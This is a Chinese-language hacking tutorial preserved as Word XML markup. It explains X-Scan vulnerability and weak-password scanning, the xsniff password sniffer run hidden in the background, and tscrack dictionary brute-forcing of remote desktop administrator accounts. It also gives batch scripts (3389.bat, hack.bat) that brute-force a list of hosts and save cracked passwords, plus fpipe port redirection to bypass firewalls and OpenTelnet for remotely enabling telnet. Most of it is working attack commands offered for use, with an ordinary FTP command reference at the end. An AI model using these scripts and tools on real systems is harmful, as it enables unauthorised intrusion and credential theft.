    <w:p w14:paraId="47EB2664" w14:textId="7D2DF1B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的区别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"&gt;"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指：覆盖；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"&gt;&gt;"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指：保存到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添加到）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C96AF" w14:textId="090F087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@dir c:winnt &gt;&gt; d:log.txt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@dir c:winnt &gt; d:log.txt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二个命令分别执行二次比较看：用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的则是把二次的结果都保存了，而用：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则只有一次的结果，是因为第二次的结果把第一次的覆盖了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D6E93" w14:textId="0966C60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八：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7BD51" w14:textId="1C7665D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扫描工具：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xscan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816A3F1" w14:textId="2DA3DAB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基本格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C3FE3" w14:textId="6954755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xscan -host &lt;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起始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IP&gt;[-&lt;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终止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IP&gt;] &lt;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检测项目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其他选项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扫锚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起始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到终止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段的所有主机信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BB5D7" w14:textId="4F19C33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xscan -file &lt;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主机列表文件名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 &lt;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检测项目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其他选项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扫锚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列表文件名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中的所有主机信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038BD2CC" w14:textId="5339EF4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检测项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26229FD9" w14:textId="0D4889E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-active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检测主机是否存活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B031A" w14:textId="0C9CB15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-os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检测远程操作系统类型（通过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NETBIOS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SNMP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协议）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392C9EC" w14:textId="490BD6D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-port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检测常用服务的端口状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41593588" w14:textId="43749FD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-ftp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弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667713C" w14:textId="6A07B87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-pub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服务匿名用户写权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FC192" w14:textId="2226D0F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-pop3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POP3-Server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弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61CF69" w14:textId="180C767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-smtp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SMTP-Server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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165ED307" w14:textId="27F7F97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-sql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SQL-Server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弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED26BF7" w14:textId="203D373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-smb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NT-Server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弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984B3F3" w14:textId="09F9B9A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-iis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IIS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编码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/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解码漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F86D95" w14:textId="43F7419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-cgi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CGI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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90D428" w14:textId="20576F9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-nasl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加载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Nessus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攻击脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227D315" w14:textId="6F329EF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-all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检测以上所有项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD98A38" w14:textId="5124495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其它选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00986C07" w14:textId="6898CDE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-i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适配器编号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设置网络适配器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 &lt;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适配器编号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&gt;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可通过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"-l"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参数获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274E84F" w14:textId="29B9219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显示所有网络适配器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A011F81" w14:textId="5B51C75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显示详细扫描进度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822602B" w14:textId="7E8A799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跳过没有响应的主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D03654" w14:textId="34D6C7A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跳过没有检测到开放端口的主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0ECCA" w14:textId="7C98C90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并发线程数量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,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并发主机数量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指定最大并发线程数量和并发主机数量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,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默认数量为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100,10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48C4AB" w14:textId="711CE76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-log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指定扫描报告文件名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后缀为：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HTML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格式的文件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61ADB24E" w14:textId="43E3669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用法示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E409D" w14:textId="715F486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xscan -host 192.168.1.1-192.168.255.255 -all -active -p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192.168.1.1-192.168.255.255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网段内主机的所有漏洞，跳过无响应的主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55219E8D" w14:textId="340C54B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xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o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192.168.1.1-192.168.255.255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网段内主机的标准端口状态，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弱口令用户，最大并发线程数量为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150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，跳过没有检测到开放端口的主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC670F" w14:textId="1868AB1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xscan -file hostlist.txt -port -cgi -t 200,5 -v -o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“hostlist.txt”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文件中列出的所有主机的标准端口状态，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CGI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漏洞，最大并发线程数量为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200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，同一时刻最多检测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台主机，显示详细检测进度，跳过没有检测到开放端口的主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932AEA4" w14:textId="77777777" w:rsidR="00AB4B59" w:rsidRDefault="00AB4B59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14:paraId="0D9A6A24" w14:textId="2611F00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九：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6A9B0" w14:textId="04B4FBA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命令行方式嗅探器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 xsniff.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708B122" w14:textId="2327808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可捕获局域网内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FTP/SMTP/POP3/HTTP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协议密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53804A47" w14:textId="018611A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参数说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE7954" w14:textId="10DF8D4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-tcp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输出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TCP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数据报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F718F29" w14:textId="3EE937A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-udp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输出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UDP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数据报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E1DA4" w14:textId="3E64D6F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-icmp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输出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ICMP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数据报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113FF42" w14:textId="686F259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-pass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过滤密码信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0734695C" w14:textId="59C3502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-hide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后台运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAB4DC" w14:textId="3859B20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-host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解析主机名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B90583" w14:textId="397DCBE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-addr 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过滤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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76151ECC" w14:textId="55749D4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-port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过滤端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B63E5" w14:textId="57B8D46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-log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将输出保存到文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E441A17" w14:textId="49BEA81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-asc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形式输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9AC4A" w14:textId="53CF723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-hex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进制形式输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494354BF" w14:textId="40DE3C8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用法示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716F044" w14:textId="4FE6D59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xsniff.exe -pass -hide -log pass.log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后台运行嗅探密码并将密码信息保存在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pass.log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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C221F" w14:textId="342632F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xsniff.exe -tcp -udp -asc -addr 192.168.1.1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嗅探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192.168.1.1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并过滤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tcp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udp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信息并以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格式输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85A255" w14:textId="5F808FC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终端服务密码破解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 tscrack.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B14AA8" w14:textId="6F45BDC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参数说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389D637" w14:textId="525E55B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-h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显示使用帮助</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBC4E3" w14:textId="33EF6CE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显示版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED0830" w14:textId="315A7A6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-s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在屏幕上打出解密能力</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FFD78" w14:textId="660DF84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-b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密码错误时发出的声音</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118BAAE1" w14:textId="77B3081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-t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同是发出多个连接（多线程）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36273BC0" w14:textId="797C8E0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-N Prevent System Log entries on targeted server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2C0F91" w14:textId="53AC718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-U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卸载移除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tscrack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组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DE6D9" w14:textId="144F0B9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-f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后面的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DDD03" w14:textId="13D8313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-F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间隔时间（频率）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C48F30" w14:textId="35EB0ED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-l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后面的用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5E8C5" w14:textId="11F3A38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-w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后面的密码字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFC094" w14:textId="4473302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后面的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BE700" w14:textId="3ED11FF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登录主页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6259C0CB" w14:textId="21A50CC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用法示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284604C3" w14:textId="7DA5841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tscrack 192.168.0.1 -l administrator -w pass.dic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远程用密码字典文件暴破主机的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administrator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的登陆密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21317E97" w14:textId="7924E52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tscrack 192.168.0.1 -l administrator -p 123456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123456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远程登陆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192.168.0.1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administrator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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D220DB" w14:textId="58A3836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@if not exist ipcscan.txt goto noscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7294F719" w14:textId="1F4EA37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@for /f "tokens=1 delims= " %%i in (</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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3389.txt) do call hack.bat %%inscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D87FE7" w14:textId="170A896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@echo 3389.txt no find or scan faild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFAAA5" w14:textId="69E7353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3389.bat)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（假设现有用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SuperScan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或其它扫锚器扫到一批开有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的主机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列表文件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3389.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19323ABC" w14:textId="192AEF4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3389.bat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意思是：从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文件中取一个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，接着运行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hack.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703FA04" w14:textId="3AB3CB5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@if not exist tscrack.exe goto noscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B3C61" w14:textId="26858EA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@tscrack %1 -l administrator -w pass.dic &gt;&gt;rouji.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14680F50" w14:textId="7FCD31B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:noscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77201AC5" w14:textId="6A44294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@echo tscrack.exe no find or scan faild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AFE5F0" w14:textId="3AD04A9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②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hack.bat) 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运行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3389.bat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就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，且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3389.bat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hack.bat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pass.dic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tscrack.exe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在同一个目录下；就可以等待结果了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6814F117" w14:textId="5E15E52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hack.bat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意思是：运行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tscrack.exe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用字典暴破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3389.txt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中所有主机的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administrator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密码，并将破解结果保存在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rouji.txt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文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671F572" w14:textId="73D15EB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其它</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1D414" w14:textId="79316DB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Shutdown.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91EFE9" w14:textId="04BDDA9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Shutdown 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地址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t:20 20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秒后将对方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自动关闭（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Windows 2003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系统自带工具，在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Windows2000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下用进就得下载此工具才能用。在前面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Windows 2003 DOS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命令中有详细介绍。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADA606" w14:textId="6A099BE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fpipe.exe (TCP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端口重定向工具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)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在第二篇中有详细说明（端口重定向绕过防火墙）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6E8A1" w14:textId="1A13BFE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fpipe -l 80 -s 1029 -r 80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当有人扫锚你的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端口时，他扫到的结果会完全是的主机信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D74805" w14:textId="311B792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Fpipe -l 23 -s 88 -r 23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把本机向目标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发送的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请求经端口重定向后，就通过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端口发送到目标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端口。（与目标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建立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时本机就用的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88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端口与其相连接）然后：直接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 127.0.0.1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（本机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）就连接到目标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端口了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2D85C" w14:textId="702C095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OpenTelnet.exe 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远程开启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工具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28631485" w14:textId="47BD82C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opentelnet.exe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帐号　密码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ntlm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认证方式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端口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（不需要上传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ntlm.exe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破坏微软的身份验证方式）直接远程开启对方的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服务后，就可用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telnet ip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连接上对方。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16F6A6" w14:textId="2C9A480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NTLM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认证方式：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：不使用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NTLM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身份验证；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：先尝试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NTLM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身份验证，如果失败，再使用用户名和密码；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：只使用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NTLM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身份验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18013153" w14:textId="168D4D6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ResumeTelnet.exe (OpenTelnet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附带的另一个工具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</w:p>
    <w:p w14:paraId="00CDE9BD" w14:textId="3C0A581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resumetelnet.exe IP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帐号　密码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连接完对方后，就用这个命令将对方的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设置还原，并同时关闭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Telnet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服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768CAE0E" w14:textId="5CD1CF5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命令详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE4A59" w14:textId="16DF3D9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命令是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Internet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用户使用最频繁的命令之一，熟悉并灵活应用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的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台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下载，那么就必须学习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指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76EFB4" w14:textId="078186C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的命令行格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6AF25" w14:textId="4F8C47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 -v -d -i -n -g [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]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，其中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A07DF" w14:textId="40764F1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-v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显示远程服务器的所有响应信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC98EE" w14:textId="629EB553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-n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限制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的自动登录，即不使用；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.n etrc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文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E3AEA9" w14:textId="59FF7DB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-d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使用调试方式；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B07F2E" w14:textId="208DAC0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-g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取消全局文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BF63B" w14:textId="0614D6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使用的内部命令如下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中括号表示可选项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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF20C47" w14:textId="0D1D685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1.![cmd[args]]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：在本地机中执行交互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shell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exit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回到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环境，如：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!ls*.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDC746" w14:textId="6125FFF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2.$ macro-ame[args]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执行宏定义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macro-name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1862AD36" w14:textId="55C47EB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3.account[password]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提供登录远程系统成功后访问系统资源所需的补充口令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BAFDC" w14:textId="516D819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4.append local-file[remote-file]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：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB64A17" w14:textId="3440B06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5.ascii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类型传输方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B450C8D" w14:textId="2B94D4F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6.bell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：每个命令执行完毕后计算机响铃一次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF5FE7" w14:textId="47D43A7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7.bin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：使用二进制文件传输方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F0338" w14:textId="6EB3DCA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8.bye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：退出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会话过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB8789" w14:textId="5718453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9.case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：在使用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时，将远程主机文件名中的大写转为小写字母。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B66EA" w14:textId="74E1626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10. cd remote-dir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：进入远程主机目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F7F82D" w14:textId="49A3810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11.cdup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：进入远程主机目录的父目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F88FAC" w14:textId="32DB53B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12.chmod mode file-name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：将远程主机文件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file-name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的存取方式设置为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mode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chmod 777 a.out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07AC6B3E" w14:textId="5EB8F46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13.close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：中断与远程服务器的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会话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open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对应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7C9ACE03" w14:textId="37EC4A8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14 .cr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方式传输文件时，将回车换行转换为回行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE3489" w14:textId="49F207C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15.delete remote-file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：删除远程主机文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9257E4" w14:textId="7530C8F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16.debug[debug-value]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：设置调试方式，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显示发送至远程主机的每条命令，如：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deb up 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，若设为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，表示取消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debug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5542A3CA" w14:textId="18C82E1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17.dir[remote-dir][local-file]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：显示远程主机目录，并将结果存入本地文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78924DAD" w14:textId="35443E6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18.disconnection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close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1FBAE920" w14:textId="2E3D687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19.form format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：将文件传输方式设置为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format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，缺省为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方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E2D17" w14:textId="58164F8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20.get remote-file[local-file]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将远程主机的文件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remote-file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传至本地硬盘的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4964BB99" w14:textId="1577A25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21.glob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mdelete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mput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的文件名扩展，缺省时不扩展文件名，同命令行的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-g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参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DBA2B" w14:textId="77CE135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22.hash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：每传输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1024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字节，显示一个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hash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符号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(#)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4A5BD871" w14:textId="3CC953D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23.help[cmd]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内部命令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的帮助信息，如：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help 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408B3234" w14:textId="7D6DE5FE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24.idle[seconds]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：将远程服务器的休眠计时器设为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[seconds]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秒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3711D5D9" w14:textId="09125AE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25.image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：设置二进制传输方式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binary)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4245C152" w14:textId="4A5F70C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26.lcd[dir]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：将本地工作目录切换至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09163851" w14:textId="186B959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27. ls[remote-dir][local-file]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：显示远程目录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remote-dir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并存入本地文件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347B2084" w14:textId="14545ED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28.macdef macro-name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：定义一个宏，遇到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macdef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下的空行时，宏定义结束。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B3E6B" w14:textId="28EECBB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29.mdelete[remote-file]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：删除远程主机文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6803D" w14:textId="5E0F60A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30.mdir remote-files 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dir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类似，但可指定多个远程文件，如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mdir *.o.*.zipoutfile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1C627742" w14:textId="0DCCFD0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31.mget remote-files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：传输多个远程文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885E351" w14:textId="685C4117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32.mkdir dir-name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：在远程主机中建一目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E40B8" w14:textId="6B48C01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33.mls remote-file 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nlist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，但可指定多个文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B57F5B" w14:textId="7153AC6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34.mode[modename]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：将文件传输方式设置为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modename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缺省为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stream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方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E3757D" w14:textId="1B769C0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35.modtime file-name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：显示远程主机文件的最后修改时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F156D" w14:textId="6E432C8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36.mput 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：将多个文件传输至远程主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885C859" w14:textId="38E3843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37.newer file-name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如果远程机中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file-name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的修改时间比本地硬盘同名文件的时间更近，则重传该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F63B854" w14:textId="2DD59CD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38.nlist[remote-dir][local-file]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：显示远程主机目录的文件清单，并存入本地硬盘的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1FA3389F" w14:textId="2399E56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39.nmap[inpattern outpattern]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：设置文件名映射机制，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使得文件传输时，文件中的某些字符相互转换，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nmap $1.$2.$3[$1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$2].[$2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$3]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，则传输文件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a1.a2.a3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时，文件名变为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该命令特别适用于远程主机为非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UNIX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机的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BFF7E3" w14:textId="056930C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40.ntrans[inchars[outchars]]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：设置文件名字符的翻译机制，如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ntrans1R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，则文件名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LLL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将变为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RRR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0695AE4A" w14:textId="323965A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41.open host[port]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：建立指定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服务器连接，可指定连接端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BF2CC" w14:textId="5BCDC27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42.passive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：进入被动传输方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE5280" w14:textId="56C70B6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43.prompt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：设置多个文件传输时的交互提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FE2E5" w14:textId="6F38791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44.proxy ftp-cmd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：在次要控制连接中，执行一条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该命令允许连接两个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服务器，以在两个服务器间传输文件。第一条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命令必须为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open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，以首先建立两个服务器间的连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D068B3" w14:textId="0316C9FB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45.put local-file[remote-file]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：将本地文件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传送至远程主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D5819" w14:textId="2C2B53D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46.pwd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：显示远程主机的当前工作目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49396BFB" w14:textId="396B94C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47.quit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bye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，退出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会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF05F2B" w14:textId="4C6B668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48.quote arg1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arg2...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：将参数逐字发至远程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服务器，如：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quote syst.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327FBD14" w14:textId="37AB957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49.recv remote-file[local-file]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6985748A" w14:textId="742F1F06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50.reget remote-file[local-file]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：类似于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但若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local-file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存在，则从上次传输中断处续传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4CEE4" w14:textId="21E0F55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51.rhelp[cmd-name]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：请求获得远程主机的帮助。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211C4DC" w14:textId="53D8ACE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52.rstatus[file-name]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：若未指定文件名，则显示远程主机的状态，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否则显示文件状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA296D" w14:textId="0C1AC2F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53.rename[from][to]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：更改远程主机文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D41DF4" w14:textId="51F1358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54.reset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：清除回答队列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328DEDF0" w14:textId="48EFD80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55.restart marker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：从指定的标志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marker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处，重新开始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get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或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put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restart 130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09EDD0EE" w14:textId="1CD8C4EC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56.rmdir dir-name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：删除远程主机目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374EB8B" w14:textId="0CB70F1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57.runique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：设置文件名只一性存储，若文件存在，则在原文件后加后缀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.1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.2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等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CE600" w14:textId="3476696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58.send local-file[remote-file]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put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4D9051CF" w14:textId="7809FAB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59.sendport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PORT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命令的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F5ACD" w14:textId="4758213A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60.site arg1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arg2...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：将参数作为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SITE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命令逐字发送至远程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主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B33D3" w14:textId="58A060B8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61.size file-name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：显示远程主机文件大小，如：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site idle 7200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0BB01F31" w14:textId="1897E57F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62.status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：显示当前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ftp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状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA93FBD" w14:textId="797937F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63.struct[struct-name]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：将文件传输结构设置为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struct-name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缺省时使用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stream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结构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF248E" w14:textId="2576AD99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64.sunique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：将远程主机文件名存储设置为只一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与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runique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对应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)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002A2ED6" w14:textId="6122C5B1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65.system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：显示远程主机的操作系统类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5373A6" w14:textId="3B272635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66.tenex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：将文件传输类型设置为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TENEX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机的所需的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35889214" w14:textId="3AB61D74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67.tick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：设置传输时的字节计数器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5358EB59" w14:textId="1DC0AC1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68.trace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：设置包跟踪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15498642" w14:textId="68C51BB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69.type[type-name]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：设置文件传输类型为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type-name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，缺省为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ascii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，如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:type binary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，设置二进制传输方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B04C0C" w14:textId="18EC6C82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70.umask[newmask]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：将远程服务器的缺省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umask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设置为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newmask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umask 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662396F" w14:textId="693BAABD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71.user user-name[password][account]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：向远程主机表明自己的身份，需要口令时，必须输入口令，如：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user anonymous my@email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14:paraId="41421F55" w14:textId="18BDCD40" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="00137FA7" w:rsidP="00137F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72.verbose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：同命令行的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-v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参数，即设置详尽报告方式，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ftp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服务器的所有响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应都将显示给用户，缺省为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on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B24E20E" w14:textId="404791A9" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="00137FA7" w:rsidP="00AB4B5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73.?[cmd]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：同</w:t>
      </w:r>
      <w:r w:rsidRPr="00137FA7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>help.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00137FA7" w:rsidRPr="0013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D4"/>
    <w:rsid w:val="00137FA7"/>
    <w:rsid w:val="003B6716"/>
    <w:rsid w:val="0069358E"/>
    <w:rsid w:val="008C1716"/>
    <w:rsid w:val="00AB4B59"/>
    <w:rsid w:val="00C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19E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{59856F19-A806-4CBD-8A14-527A2A1B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F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FA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37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7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</Pages>
  <Words>3113</Words>
  <Characters>17749</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>147</Lines>
  <Paragraphs>41</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>20821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zhellow</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhellow</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-03T05:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-03T05:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>